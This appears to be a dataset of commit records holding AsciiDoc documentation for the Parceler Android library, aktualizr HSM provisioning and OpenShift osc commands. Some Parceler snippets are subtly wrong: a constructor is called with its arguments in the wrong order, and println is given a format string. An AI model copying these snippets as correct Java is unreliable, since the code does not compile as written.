Parcelable must define a `public final static Parcelable.Creator CREATOR` in order for the Android infrastructure to be able to leverage the serialization code.\n\nParceler is a code generation library that generates the Android Parcelable boilerplate source code.\nNo longer do you have to implement the Parcelable interface, the `writeToParcel()` or `createFromParcel()` or the `public static final CREATOR`.\nYou simply annotate a POJO with `@Parcel` and Parceler does the rest.\nBecause Parceler uses the Java JSR-269 Annotation Processor, there is no need to run a tool manually to generate the Parcelable code.\nJust annotate your Java Bean, compile and you are finished.\nBy default, Parceler will serialize the fields of your instance directly:\n\n[source,java]\n----\n@Parcel\npublic class Example {\n String name;\n int age;\n\n public Example(){ \/*Required empty bean constructor*\/ }\n\n public Example(int age, String name) {\n this.age = age;\n this.name = name;\n }\n\n public String getName() { return name; }\n\n public int getAge() { return age; }\n}\n----\n\nBe careful not to use private fields when using the default field serialization strategy as it will incur a performance penalty due to reflection.\n\nTo use the 
generated code, you may reference the generated class directly, or via the `Parcels` utility class:\n\n[source,java]\n----\nParcelable wrapped = Parcels.wrap(new Example(\"Andy\", 42));\n----\n\nTo dereference the `@Parcel`, just call the `Parcels.unwrap()` method:\n\n[source,java]\n----\nExample example = Parcels.unwrap(wrapped);\nexample.getName(); \/\/ Andy\nexample.getAge(); \/\/ 42\n----\n\nOf course, the wrapped `Parcelable` can be added to an Android Bundle to transfer from Activity to Activity:\n\n[source,java]\n----\nBundle bundle = new Bundle();\nbundle.putParcelable(\"example\", Parcels.wrap(example));\n----\n\nAnd dereferenced in the `onCreate()` method:\n\n[source,java]\n----\nExample example = Parcels.unwrap(this.getIntent().getExtras().get(\"example\"));\n----\n\nThis wrapping and unwrapping technique plays well with the Intent Factory pattern.\nIn addition, Parceler is supported by the following libraries:\n\n * http:\/\/androidtransfuse.org\/documentation.html#parcel[Transfuse] - Allows `@Parcel` annotated beans to be used with the `@Extra` injection.\n * https:\/\/github.com\/sockeqwe\/fragmentargs#argsbundler[FragmentArgs] - Uses the `ParcelerArgsBundler` adapter to wrap and unwrap `@Parcel` annotated beans with fragment parameters.\n * https:\/\/github.com\/f2prateek\/dart[Dart] - Autodetects `@Parcel` annotated beans and automatically unwraps them when using `@InjectExtra`.\n\n=== Parcel attribute types\nOnly a select number of types may be used as attributes of a `@Parcel` class.\nThe following list includes the mapped types:\n\n * `byte`\n * `double`\n * `float`\n * `int`\n * `long`\n * `char`\n * `boolean`\n * `String`\n * `IBinder`\n * `Bundle`\n * `SparseArray` of any of the mapped types*\n * `SparseBooleanArray`\n * `List`, `ArrayList` and `LinkedList` of any of the mapped types*\n * `Map`, `HashMap`, `LinkedHashMap`, `SortedMap`, and `TreeMap` of any of the mapped types*\n * `Set`, `HashSet`, `SortedSet`, `TreeSet`, `LinkedHashSet` of any of the mapped types*\n * `Parcelable`\n * `Serializable`\n * Array of any of the mapped types\n * Any other class annotated with `@Parcel`\n\n*Parcel will error if the generic parameter is not mapped.\n\nParceler also supports any of the above types directly.\nThis is especially useful when dealing with collections of classes annotated with `@Parcel`:\n\n[source,java]\n----\nParcelable listParcelable = Parcels.wrap(new ArrayList<Example>());\nParcelable mapParcelable = Parcels.wrap(new HashMap<String, Example>());\n----\n\n==== Polymorphism\nNote that Parceler does not unwrap inheritance hierarchies, so any polymorphic fields will be unwrapped as instances of the base class.\nThis is because Parceler opts for performance rather than checking `.getClass()` for every piece of data.\n\n[source,java]\n----\n@Parcel\npublic class Example {\n public Parent p;\n Example(Parent p) { this.p = p; }\n}\n\n@Parcel public class Parent {}\n@Parcel public class Child extends Parent {}\n----\n\n[source,java]\n----\nExample example = new Example(new Child());\nSystem.out.println(\"%b\", example.p instanceof Child); \/\/ true\nexample = Parcels.unwrap(Parcels.wrap(example));\nSystem.out.println(\"%b\", example.p instanceof Child); \/\/ false\n----\n\nRefer to the <<custom-serialization,Custom Serialization>> section for an example of working with polymorphic fields.\n\n=== Serialization techniques\n\nParceler offers several choices for how to serialize and deserialize an object in addition to the field-based serialization seen above.\n\n==== 
Getter\/setter serialization\nParceler may be configured to serialize using getter and setter methods and a non-empty constructor.\nIn addition, fields, methods and constructor parameters may be associated using the `@ParcelProperty` annotation.\nThis supports a number of bean strategies including immutability and traditional getter\/setter beans.\n\nTo configure default method serialization, simply configure the `@Parcel` annotation with `Serialization.BEAN`:\n\n[source,java]\n----\n@Parcel(Serialization.BEAN)\npublic class Example {\n private String name;\n private int age;\n\n public String getName() { return name; }\n public void setName(String name) { this.name = name; }\n\n public int getAge() { return age; }\n public void setAge(int age) { this.age = age; }\n}\n----\n\nTo use a constructor with serialization, annotate the desired constructor with the `@ParcelConstructor` annotation:\n\n[source,java]\n----\n@Parcel(Serialization.BEAN)\npublic class Example {\n private final String name;\n private final int age;\n\n @ParcelConstructor\n public Example(int age, String name) {\n this.age = age;\n this.name = name;\n }\n\n public String getName() { return name; }\n\n public int getAge() { return age; }\n}\n----\n\nIf an empty constructor is present, Parceler will use that constructor unless another constructor is annotated.\n\n==== Mixing getters\/setters and fields\nYou may also mix and match serialization techniques using the `@ParcelProperty` annotation.\nIn the following example, `firstName` and `lastName` are written to the bean using the constructor while `firstName` is read from the bean using the field and `lastName` is read using the `getLastName()` method.\nThe parameters `firstName` and `lastName` are coordinated by the parameter names `\"first\"` and `\"last\"` respectfully.\n\n[source,java]\n----\n@Parcel\npublic class Example {\n @ParcelProperty(\"first\")\n String firstName;\n String lastName;\n\n @ParcelConstructor\n public Example(@ParcelProperty(\"first\") String firstName, @ParcelProperty(\"last\") String lastName){\n this.firstName = firstName;\n this.lastName = lastName;\n }\n\n public String getFirstName() { return firstName; }\n\n @ParcelProperty(\"last\")\n public String getLastName() { return lastName; }\n}\n----\n\nFor attributes that should not be serialized with Parceler, the attribute field, getter or setter may be annotated by `@Transient`.\n\nParceler supports many different styles centering around the POJO.\nThis allows `@Parcel` annotated classes to be used with other POJO based libraries, including https:\/\/code.google.com\/p\/google-gson\/[GSON], https:\/\/bitbucket.org\/qbusict\/cupboard[Cupboard], and http:\/\/simple.sourceforge.net\/[Simple XML] to name a few.\n\n==== Static Factory support\nAs an alternative to using a constructor directly, Parceler supports using an annotated Static Factory to build an instance of the given class.\nThis style supports Google's https:\/\/github.com\/google\/auto\/tree\/master\/value[AutoValue] annoation processor \/ code generation library for generating immutable beans.\nParceler interfaces with AutoValue via the `@ParcelFactory` annotation, which maps a static factory method into the annotated `@Parcel` serialization:\n\n[source,java]\n----\n@AutoValue\n@Parcel\npublic abstract class AutoValueParcel {\n\n @ParcelProperty(\"value\") public abstract String value();\n\n @ParcelFactory\n public static AutoValueParcel create(String value) {\n return new AutoValue_AutoValueParcel(value);\n }\n}\n----\n\nAutoValue 
generates a different class than the annotated `@Parcel`, therefore, you need to specify which class Parceler should build in the `Parcels` utility class:\n\n[source,java]\n----\nParcelable wrappedAutoValue = Parcels.wrap(AutoValueParcel.class, AutoValueParcel.create(\"example\"));\n----\nAnd to deserialize:\n[source,java]\n----\nAutoValueParcel autoValueParcel = Parcels.unwrap(wrappedAutoValue);\n----\n\n==== Custom serialization\n`@Parcel` includes an optional parameter to include a manual serializer `ParcelConverter` for the case where special serialization is necessary.\nThis provides a still cleaner option for using Parcelable classes than implementing them by hand.\n\nThe following code demonstrates using a `ParcelConverter` to unwrap the inheritance hierarchy during deserialization.\n\n[source,java]\n----\n@Parcel\npublic class Item {\n @ParcelPropertyConverter(ItemListParcelConverter.class)\n public List<Item> itemList;\n}\n@Parcel public class SubItem1 extends Item {}\n@Parcel public class SubItem2 extends Item {}\n\npublic class ItemListParcelConverter implements ParcelConverter<List<Item>> {\n @Override\n public void toParcel(List<Item> input, Parcel parcel) {\n if (input == null) {\n parcel.writeInt(-1);\n }\n else {\n parcel.writeInt(input.size());\n for (Item item : input) {\n parcel.writeParcelable(Parcels.wrap(item), 0);\n }\n }\n }\n\n @Override\n public List<Item> fromParcel(Parcel parcel) {\n int size = parcel.readInt();\n if (size < 0) return null;\n List<Item> items = new ArrayList<Item>();\n for (int i = 0; i < size; ++i) {\n items.add((Item) Parcels.unwrap(parcel.readParcelable(Item.class.getClassLoader())));\n }\n return items;\n }\n}\n----\n\n=== Classes without Java source\nFor classes whose corresponding Java source is not available, one may include the class as a Parcel by using the `@ParcelClass` annotation.\nThis annotation may be declared anywhere in the compiled source that is convenient.\nFor instance, one could include the `@ParcelClass` along with the Android Application:\n\n[source,java]\n----\n@ParcelClass(LibraryParcel.class)\npublic class AndroidApplication extends Application{\n \/\/...\n}\n----\n\nMultiple `@ParcelClass` annotations may be declared using the `@ParcelClasses` annotation.\n\n=== Advanced configuration\n\n==== Skipping analysis\nIt is a common practice for some libraries to require a bean to extend a base class.\nAlthough it is not the most optimal case, Parceler supports this practice by allowing the configuration of what classes in the inheritance hierarchy to analyze via the analyze parameter:\n\n[source, java]\n----\n@Parcel(analyze = {One.class, Three.class})\nclass One extends Two {}\nclass Two extends Three {}\nclass Three extends BaseClass {}\n----\n\nIn this example, only fields of the `One` and `Three` classes will be serialized, avoiding both the `BaseClass` and `Two` class parameters.\n\n==== Specific wrapping\n\nThe Parcels utility class looks up the given class for wrapping by class.\nFor performance reasons this ignores inheritance, both super and base classes.\nThere are two solutions to this problem.\nFirst, one may specify additional types to associate to the given type via the `implementations` parameter:\n\n[source, java]\n----\nclass ExampleProxy extends Example {}\n@Parcel(implementations = {ExampleProxy.class})\nclass Example {}\n\nExampleProxy proxy = new ExampleProxy();\nParcels.wrap(proxy); \/\/ ExampleProxy will be serialized as a Example\n----\n\nSecond, one may also specify the class type when using the 
`Parcels.wrap()` method:\n\n[source, java]\n----\nExampleProxy proxy = new ExampleProxy();\nParcels.wrap(Example.class, proxy);\n----\n\n==== Avoiding Parcels indexing\n\nUsing Parceler in libraries can be challenging because Parceler writes a single mapping class `Parceler$$Parcels` to associate a given type with a `Parcelable`.\nThis mapping class can collide giving the following error during compilation:\n\n[source, bash]\n----\nError Code:\n 2\nOutput:\n UNEXPECTED TOP-LEVEL EXCEPTION:\n com.android.dex.DexException: Multiple dex files define Lorg\/parceler\/Parceler$$Parcels$1;\n at com.android.dx.merge.DexMerger.readSortableTypes(DexMerger.java:594)\n at com.android.dx.merge.DexMerger.getSortedTypes(DexMerger.java:552)\n at com.android.dx.merge.DexMerger.mergeClassDefs(DexMerger.java:533)\n ....\n----\n\nTo avoid writing this common mapping class, set `parcelsIndex = false` to each of the library classes.\nParceler will not write a `Parceler$$Parcels` mapping class if no indexable classes exist and the Parcels utiltiy class will fallback to looking up the generated class by name.\n\nAlternatively, using `@ParcelClass` in the root project, instead of annotating classes directly in the library can avoid this issue.\n\n==== Configuring Proguard\n\nTo configure Proguard, add the following lines to your proguard configuration file. These will keep files related to the `Parcels` utilty class and the `Parcelable` `CREATOR` instance:\n\n----\n# Parcel library\n-keep class * implements android.os.Parcelable {\n public static final android.os.Parcelable$Creator *;\n}\n\n-keep class org.parceler.Parceler$$Parcels\n----\n\n== Getting Parceler\n\nYou may download Parceler as a Maven dependency:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.parceler<\/groupId>\n <artifactId>parceler<\/artifactId>\n <version>${parceler.version}<\/version>\n <scope>provided<\/scope>\n<\/dependency>\n<dependency>\n <groupId>org.parceler<\/groupId>\n <artifactId>parceler-api<\/artifactId>\n <version>${parceler.version}<\/version>\n<\/dependency>\n----\n\nor Gradle:\n[source,groovy]\n----\ncompile \"org.parceler:parceler-api:${parcelerVersion}\"\napt \"org.parceler:parceler:${parcelerVersion}\"\n----\n\nOr from http:\/\/search.maven.org\/#search%7Cga%7C1%7Cg%3A%22org.parceler%22[Maven Central].\n\n== License\n----\nCopyright 2011-2015 John Ericksen\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n----\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"673ff580e9bdb5bb9f5c26b9cb9cda23c9e0ffad","subject":"updated hsm-provisioning docs with same change","message":"updated hsm-provisioning docs with same change\n\nSigned-off-by: EpicNuts <6ab4c33e0e9a1a158ee8b2405252330895b0dab1@gmail.com>\n","repos":"advancedtelematic\/sota_client_cpp,advancedtelematic\/aktualizr,advancedtelematic\/sota_client_cpp,advancedtelematic\/aktualizr,advancedtelematic\/aktualizr,advancedtelematic\/aktualizr","old_file":"docs\/hsm-provisioning.adoc","new_file":"docs\/hsm-provisioning.adoc","new_contents":"= Implicit Provisioning with 
an HSM\n\nThis document describes the current support for implicit provisioning with an HSM in Aktualizr and https:\/\/github.com\/advancedtelematic\/meta-updater[meta-updater]. An example of this process is provided by using the `softhsm` software implementation of an HSM.\n\n== Background\n\nIn automatic provisioning, bootstrap credentials are downloaded and installed on devices to initiate the provisioning process. In implicit provisioning with an HSM, devices shall have an HSM that is pre-loaded with the requisite provisioning credentials. These credentials shall be signed by a root CA certificate which shall be uploaded to the server. The server will thus be able to authenticate a client device by verifying that the client's certificate was signed by the uploaded root CA.\n\n== Configuration\n\nThe following items are relevant for implicit provisioning:\n\n\/\/ tag::summary-table[]\n\n[options=header]\n|===================\n| Configuration option | Where it will come from\/what it does\n| Server URL | Read from credentials archive\n| Server Root CA cert | Read from credentials archive\n| Fleet Root CA cert | Chain of trust for a device fleet; provided by the user. Must be uploaded by user to the server.\n| Fleet Root CA private key | Key for signing device certs in the fleet; provided by user, but used only for signing. Not stored on device.\n| TLS device cert | Pre-installed in the device HSM; must be signed by Fleet Root CA private key\n| TLS device key | Pre-installed in the device HSM\n| Device ID | Read from Common Name field of TLS device cert\n| Uptane public\/private key | Automatically generated by Aktualizr\n| Uptane primary serial number | Automatically generated by Aktualizr\n| Primary ECU Hardware ID | Automatically generated by Aktualizr\n|===================\n\n\/\/ end::summary-table[]\n\nAn example `.toml` configuration file can be found at link:..\/config\/sota_hsm_prov.toml[]. This is what is used during bitbaking with meta-updater.\n\n== Steps\n\n\/\/ tag::full-instructions[]\n\n. Generate a root CA private key and self-signed certificate.\n+\nIf you do not have your own CA certificate for signing device certificates, you can generate a self-signed certificate for testing.\n+\nYou can examine the `new_server` function in link:https:\/\/github.com\/advancedtelematic\/ota-community-edition\/blob\/master\/scripts\/start.sh#L127[OTA Community Edition's `start.sh`] for one way of generating the cert.\n+\nThis will create a `.\/${SERVER_DIR}\/devices\/` directory with the `ca.crt` certificate and a `ca.key` private key. Keep the private key safe and secure.\n. Upload the root CA certificate to the server. To add a root CA certificate to link:https:\/\/connect.ota.here.com[HERE OTA Connect], contact link:mailto:otaconnect.support@here.com[otaconnect.support@here.com].\n. Generate a device certificate and key, and sign it with the root CA you just created.\n+\nExamine the link:https:\/\/github.com\/advancedtelematic\/ota-community-edition\/blob\/master\/scripts\/start.sh#L89[`new_client` function in start.sh] for one way to do that.\n. Add the internal root CA certificate of the device gateway the device will connect to. 
To get the device gateway's certificate, use openssl:\n+\n----\nexport device_gateway=your-gateway-url # for OTA Connect, looks something like\n # a3378fca-4e4c-4a5d-b1c2-d5c5ec35b3c2.tcpgw.prod01.advancedtelematic.com\nopenssl s_client -connect ${device_gateway}:8000 -servername $device_gateway -showcerts | \\\n sed -n '\/-BEGIN CERTIFICATE-\/,\/-END CERTIFICATE-\/p' > ${device_dir}\/root.crt\n----\n. Add the following lines to your `conf\/local.conf`:\n+\n----\nSOTA_CLIENT_FEATURES = \"hsm\"\nSOTA_CLIENT_PROV = \"aktualizr-hsm-prov\"\nSOTA_DEPLOY_CREDENTIALS = \"0\"\nIMAGE_INSTALL_append = \" softhsm-testtoken \"\n----\n. Build a standard image using bitbake. Make sure an ssh server is installed; usually you can do this with `IMAGE_INSTALL_append = \" dropbear \"`.\n. Boot the image.\n. Copy the device credentials and device gateway root CA certificate to the device's HSM. For the QEMU simulated HSM, enter the device directory whose credentials you wish to copy, then do:\n+\n----\nscp -P 2222 -pr .\/ root@localhost:\/var\/sota\/import\n----\n. The server authenticates the client device by verifying that the client's certificate was signed by the root CA private key that was uploaded in step 2.\n. The client device authenticates the server by verifying that the server's certificate was signed by the server's internal root CA private key.\n. The device is provisioned, and will appear online in the web UI.\n\n\/\/ end::full-instructions[]\n\n== Simulated implicit provisioning with `aktualizr-cert-provider`\n\nImplicit provisioning can be simulated with `aktualizr-cert-provider` without need for the user to create a root CA. `aktualizr-cert-provider` can use the existing autoprovisioning mechanisms to pre-install a certificate and key on the device.\n\n\/\/ tag::quick-instructions[]\n\n1. In local.conf, set `SOTA_CLIENT_FEATURES = \"hsm\"`, `SOTA_CLIENT_PROV = \"aktualizr-hsm-prov\"`, `SOTA_DEPLOY_CREDENTIALS = \"0\"`, and `IMAGE_INSTALL_append = \" softhsm-testtoken \"`. Currently, you will also need to set `SOTA_PACKED_CREDENTIALS` to provisioning credentials zip file.\n1. Build a standard image using bitbake.\n1. Boot the image.\n1. Optionally, verify that Aktualizr has not provisioned and that the device is not known to the server.\n1. Load credentials onto the device, for example with `aktualizr-cert-provider` from the Aktualizr repo: `aktualizr-cert-provider -c credentials.zip -t <device> -d \/var\/sota\/import -r -u`\n1. Verify that Aktualizr provisions correctly with the server using the expected Device ID.\n\n\/\/ end::quick-instructions[]\n\n== Credentials format\n\nThe provisioning credentials zip file format is specified in link:credentials.adoc[]. However, the only files in the archive used by `aktualizr-cert-provider` are `autoprov.url` and `autoprov_credentials.p12`. Note that `treehub.json` is required by `garage-sign`, and offline signing may require additional files.\n","old_contents":"= Implicit Provisioning with an HSM\n\nThis document describes the current support for implicit provisioning with an HSM in Aktualizr and https:\/\/github.com\/advancedtelematic\/meta-updater[meta-updater]. An example of this process is provided by using the `softhsm` software implementation of an HSM.\n\n== Background\n\nIn automatic provisioning, bootstrap credentials are downloaded and installed on devices to initiate the provisioning process. In implicit provisioning with an HSM, devices shall have an HSM that is pre-loaded with the requisite provisioning credentials. 
These credentials shall be signed by a root CA certificate which shall be uploaded to the server. The server will thus be able to authenticate a client device by verifying that the client's certificate was signed by the uploaded root CA.\n\n== Configuration\n\nThe following items are relevant for implicit provisioning:\n\n\/\/ tag::summary-table[]\n\n[options=header]\n|===================\n| Configuration option | Where it will come from\/what it does\n| Server URL | Read from credentials archive\n| Server Root CA cert | Read from credentials archive\n| Fleet Root CA cert | Chain of trust for a device fleet; provided by the user. Must be uploaded by user to the server.\n| Fleet Root CA private key | Key for signing device certs in the fleet; provided by user, but used only for signing. Not stored on device.\n| TLS device cert | Pre-installed in the device HSM; must be signed by Fleet Root CA private key\n| TLS device key | Pre-installed in the device HSM\n| Device ID | Read from Common Name field of TLS device cert\n| Uptane public\/private key | Automatically generated by Aktualizr\n| Uptane primary serial number | Automatically generated by Aktualizr\n| Primary ECU Hardware ID | Automatically generated by Aktualizr\n|===================\n\n\/\/ end::summary-table[]\n\nAn example `.toml` configuration file can be found at link:..\/config\/sota_hsm_prov.toml[]. This is what is used during bitbaking with meta-updater.\n\n== Steps\n\n\/\/ tag::full-instructions[]\n\n. Generate a root CA private key and self-signed certificate.\n+\nIf you do not have your own CA certificate for signing device certificates, you can generate a self-signed certificate for testing.\n+\nYou can examine the `new_server` function in link:https:\/\/github.com\/advancedtelematic\/ota-community-edition\/blob\/master\/scripts\/start.sh#L127[OTA Community Edition's `start.sh`] for one way of generating the cert.\n+\nThis will create a `.\/${SERVER_DIR}\/devices\/` directory with the `ca.crt` certificate and a `ca.key` private key. Keep the private key safe and secure.\n. Upload the root CA certificate to the server. To add a root CA certificate to link:https:\/\/connect.ota.here.com[HERE OTA Connect], contact link:mailto:otaconnect.support@here.com[otaconnect.support@here.com].\n. Generate a device certificate and key, and sign it with the root CA you just created.\n+\nExamine the link:https:\/\/github.com\/advancedtelematic\/ota-community-edition\/blob\/master\/scripts\/start.sh#L89[`new_client` function in start.sh] for one way to do that.\n. Add the internal root CA certificate of the device gateway the device will connect to. To get the device gateway's certificate, use openssl:\n+\n----\nexport device_gateway=your-gateway-url # for OTA Connect, looks something like\n # a3378fca-4e4c-4a5d-b1c2-d5c5ec35b3c2.tcpgw.prod01.advancedtelematic.com\nopenssl s_client -connect ${device_gateway}:8000 -servername $device_gateway -showcerts | \\\n sed -n '\/-BEGIN CERTIFICATE-\/,\/-END CERTIFICATE-\/p' > ${device_dir}\/root.crt\n----\n. Add the following lines to your `conf\/local.conf`:\n+\n----\nSOTA_CLIENT_FEATURES = \"hsm\"\nSOTA_CLIENT_PROV = \"aktualizr-hsm-prov\"\nSOTA_DEPLOY_CREDENTIALS = \"0\"\nIMAGE_INSTALL_append = \" softhsm-testtoken \"\n----\n. Build a standard image using bitbake. Make sure an ssh server is installed; usually you can do this with `IMAGE_INSTALL_append = \" dropbear \"`.\n. Boot the image.\n. Copy the device credentials and device gateway root CA certificate to the device's HSM. 
For the QEMU simulated HSM, enter the device directory whose credentials you wish to copy, then do:\n+\n----\nscp -P 2222 -pr .\/ root@localhost:\/var\/sota\/import\n----\n. The server authenticates the client device by verifying that the client's certificate was signed by the root CA private key that was uploaded in step 2.\n. The client device authenticates the server by verifying that the server's certificate was signed by the server's internal root CA private key.\n. The device is provisioned, and will appear online in the web UI.\n\n\/\/ end::full-instructions[]\n\n== Simulated implicit provisioning with `aktualizr-cert-provider`\n\nImplicit provisioning can be simulated with `aktualizr-cert-provider` without need for the user to create a root CA. `aktualizr-cert-provider` can use the existing autoprovisioning mechanisms to pre-install a certificate and key on the device.\n\n\/\/ tag::quick-instructions[]\n\n1. In meta-updater, set `SOTA_CLIENT_FEATURES = \"hsm\"`, `SOTA_CLIENT_PROV = \"aktualizr-hsm-prov\"`, `SOTA_DEPLOY_CREDENTIALS = \"0\"`, and `IMAGE_INSTALL_append = \" softhsm-testtoken \"`. Currently, you will also need to set `SOTA_PACKED_CREDENTIALS` to provisioning credentials zip file.\n1. Build a standard image using bitbake.\n1. Boot the image.\n1. Optionally, verify that Aktualizr has not provisioned and that the device is not known to the server.\n1. Load credentials onto the device, for example with `aktualizr-cert-provider` from the Aktualizr repo: `aktualizr-cert-provider -c credentials.zip -t <device> -d \/var\/sota\/import -r -u`\n1. Verify that Aktualizr provisions correctly with the server using the expected Device ID.\n\n\/\/ end::quick-instructions[]\n\n== Credentials format\n\nThe provisioning credentials zip file format is specified in link:credentials.adoc[]. However, the only files in the archive used by `aktualizr-cert-provider` are `autoprov.url` and `autoprov_credentials.p12`. Note that `treehub.json` is required by `garage-sign`, and offline signing may require additional files.\n","returncode":0,"stderr":"","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"5b8099abc3b64f8f75732f12a8e5b16338c854df","subject":"Doc for osc resize","message":"Doc for osc resize\n","repos":"xiaoping378\/openshift-docs,xiaoping378\/openshift-docs,xiaoping378\/openshift-docs","old_file":"cli_reference\/basic_cli_operations.adoc","new_file":"cli_reference\/basic_cli_operations.adoc","new_contents":"= CLI Operations\n{product-author}\n{product-version}\n:data-uri:\n:icons:\n:experimental:\n:toc: macro\n:toc-title:\n\ntoc::[]\n\n== Overview\nThis topic provides information on some general CLI operations and their syntax.\nYou must link:get_started_cli.html[setup and login] with the CLI before you can\nperform these operations.\n\n== Common Operations\nThe CLI allows interaction with the various objects that are managed by\nOpenShift. 
Many common `osc` operations are invoked using the following syntax:\n\n****\n`$ osc _<action>_ _<object_type>_ _<object_name_or_id>_`\n****\n\nThis specifies:\n\n- An `_<action>_` to perform, such as `get` or `describe`.\n- The `_<object_type>_` to perform the action on, such as `service` or the abbreviated `svc`.\n- The `_<object_name_or_id>_` of the specified `_<object_type>_`.\n\nFor example, the `osc get` operation returns a complete list of services that\nare currently defined:\n\n====\n\n[options=\"nowrap\"]\n----\n$ osc get svc\nNAME LABELS SELECTOR IP PORT(S)\ndocker-registry docker-registry=default docker-registry=default 172.30.78.158 5000\/TCP\nkubernetes component=apiserver,provider=kubernetes <none> 172.30.0.2 443\/TCP\nkubernetes-ro component=apiserver,provider=kubernetes <none> 172.30.0.1 80\/TCP\n----\n====\n\nThe `osc describe` operation can then be used to return detailed information\nabout a specific object:\n\n====\n\n[options=\"nowrap\"]\n----\n$ osc describe svc docker-registry\nName:\t\t\tdocker-registry\nLabels:\t\t\tdocker-registry=default\nSelector:\t\tdocker-registry=default\nIP:\t\t\t172.30.78.158\nPort:\t\t\t<unnamed>\t5000\/TCP\nEndpoints:\t\t10.1.0.2:5000\nSession Affinity:\tNone\nNo events.\n----\n====\n\nThe following table describes common `osc` operations and their general syntax:\n\n.Common CLI Operations\n[cols=\".^2,.^5,8\",options=\"header\"]\n|===\n\n|Operation |Syntax |Description\n\n|`get`\n|`osc get _<object_type>_ _<object_name_or_id>_`\n|Returns a list of objects for the specified link:#object-types[object type]. If the optional `_<object_name_or_id>_` is included in the request, then the list of results is filtered by that value.\n\n|`describe`\n|`osc describe _<object_type>_ _<object_id>_`\n|Returns information about the specific object returned by the query; a specific `_<object_name_or_id>_` must be provided. The actual information that is available varies as described in link:#object-types[object type].\n\n|`create`\n|`osc create -f _<file_or_directory_path>_`\n|Parses a configuration file and creates one or more OpenShift objects based on the file contents. The `-f` flag can be passed multiple times with different file or directory paths. When the flag is passed multiple times, `osc create` iterates through each one, creating the objects described in all of the indicated files. Any existing resources are ignored.\n\n|`resize`\n|`osc resize _<object_type>_ _<object_id>_ _<#_of_replicas>_`\n|Resizes a replication controller either directly or indirectly via a deployment configuration; `_<#_of_replicas>_` must be provided.\n\n|`update`\n|`osc update -f _<file_or_directory_path>_`\n|Attempts to modify an existing object based on the contents of the specified configuration file. The -f flag can be passed multiple times with different file or directory paths. When the flag is passed multiple times, `osc update` iterates through each one, updating the objects described in all of the indicated files.\n\n|`delete`\na|`osc delete -f _<file_path>_`\n\n`osc delete _<object_type>_ _<object_name_or_id>_`\n\n`osc delete _<object_type>_ -l _<label>_`\n\n`osc delete all -l _<label>_`\n.^|Deletes the specified OpenShift object. An object configuration can also be passed in through STDIN. The `osc delete all -l _<label>_` operation deletes all objects matching the specified `_<label>_`.\n\n|`log`\n|`osc log -f _<pod_name>_ _<container_name>_`\n|Retrieves the log output for a specific pod or container. 
\n\n== Object Types\nThe CLI supports the following object types, some of which have abbreviated\nsyntax:\n\n.Supported Object Types\n[options=\"header\"]\n|===\n\n|Object Type |Abbreviated Version\n\n|`build` |\n|`buildConfig` | `bc`\n|`deploymentConfig` | `dc`\n|`imageStream` | `is`\n|`imageStreamTag` | `istag`\n|`imageStreamImage` | `isimage`\n|`event` |`ev`\n|`minion` |`mi`\n|`pod` |`po`\n|`replicationController` |`rc`\n|`service` |`svc`\n|===\n\n== Project Operations\nThese advanced operations for administrators are used to define and instantiate\nOpenShift objects at the project level.\n\nThe simplest way to create a new project is:\n\n****\n`$ osadm new-project _<project_name>_ --display-name=_<display_name>_ --description=_<description>_ --admin=_<admin_username>_ --node-selector=_<node_label_selector>_`\n****\n\nThe following example creates a new project called `test` that appears in the\nManagement Console as \"OpenShift 3 Sample\", with `test-admin` as the project\nadmin, and launches any pods onto nodes matching the label `environment=test`.\n\n====\n\n[options=\"nowrap\"]\n----\n$ osadm new-project test --display-name=\"OpenShift 3 Sample\" --description=\"This is an example project to demonstrate OpenShift v3\" --admin=anypassword:test-admin --node-selector=\"environment=test\"\n----\n====\n\n.Project CLI Operations\n[cols=\".^2,.^5,8\",options=\"header\"]\n|===\n\n|Operation |Syntax |Description\n\n|`process`\n|`osc process -f _<template_file_path>_`\n|Transforms a project template into a project configuration file.\n\n|`apply`\n|`osc apply -f _<config_file_path>_`\n|Creates all of the OpenShift objects for a given project based on the specified configuration file.\n|===
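\n\nThese two operations are typically used one after the other: first materialize the template into a configuration file, then create the objects from it. The following is a sketch; `my-template.json` and `my-config.json` are hypothetical file names:\n\n====\n\n----\n$ osc process -f my-template.json > my-config.json\n$ osc apply -f my-config.json\n----\n====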
\n\n== Build Operations\nOne of the fundamental capabilities of OpenShift is the ability to build\napplications into a container from source. The following table describes the CLI\noperations for working with application builds.\n\n.Build CLI Operations\n[cols=\".^2,.^5,8\",options=\"header\"]\n|===\n\n|Operation |Syntax |Description\n\n|`start-build`\n|`osc start-build _<buildConfig_name>_`\n|Manually starts the build process with the specified build configuration file.\n\n|`start-build`\n|`osc start-build --from-build=_<build_name>_`\n|Manually starts the build process by specifying the name of a previous build as a starting point.\n\n|`start-build`\na|`osc start-build _<buildConfig_name>_ --follow`\n\n`osc start-build --from-build=_<build_name>_ --follow`\n|Manually starts the build process by specifying either a configuration file or the name of a previous build _and_ retrieves its build logs.\n\n|`cancel-build`\n|`osc cancel-build _<build_name>_`\n|Stops a build that is in progress.\n\n|`build-logs`\n|`osc build-logs _<build_name>_`\n|Retrieves the build logs for the specified build.\n|===\n\n== Deployment Operations\nOpenShift provides CLI access to inspect and manipulate\nlink:..\/dev_guide\/deployments.html[deployment configurations] using standard\n`osc` resource operations such as `get`, `create`, and `describe`.\n\nUse the `osc describe` command to describe a deployment configuration in\nhuman-readable form:\n\n****\n`$ osc describe dc _<deployment_config>_`\n****\n\nThe following example describes a deployment configuration called\n`docker-registry`:\n\n====\n\n[options=\"nowrap\"]\n----\n$ osc describe dc docker-registry\nName:\t\tdocker-registry\nCreated:\t18 hours ago\nLabels:\t\tdocker-registry=default\nLatest Version:\t1\nTriggers:\tConfig\nStrategy:\tRecreate\nTemplate:\n\tSelector:\tdocker-registry=default\n\tReplicas:\t1\n\tContainers:\n\t\tNAME\t\tIMAGE\t\t\t\t\tENV\n\t\tregistry\topenshift\/origin-docker-registry:v0.4.3\tOPENSHIFT_CA_DATA=[omitted for space],OPENSHIFT_MASTER=https:\/\/10.245.2.2:8443\nLatest 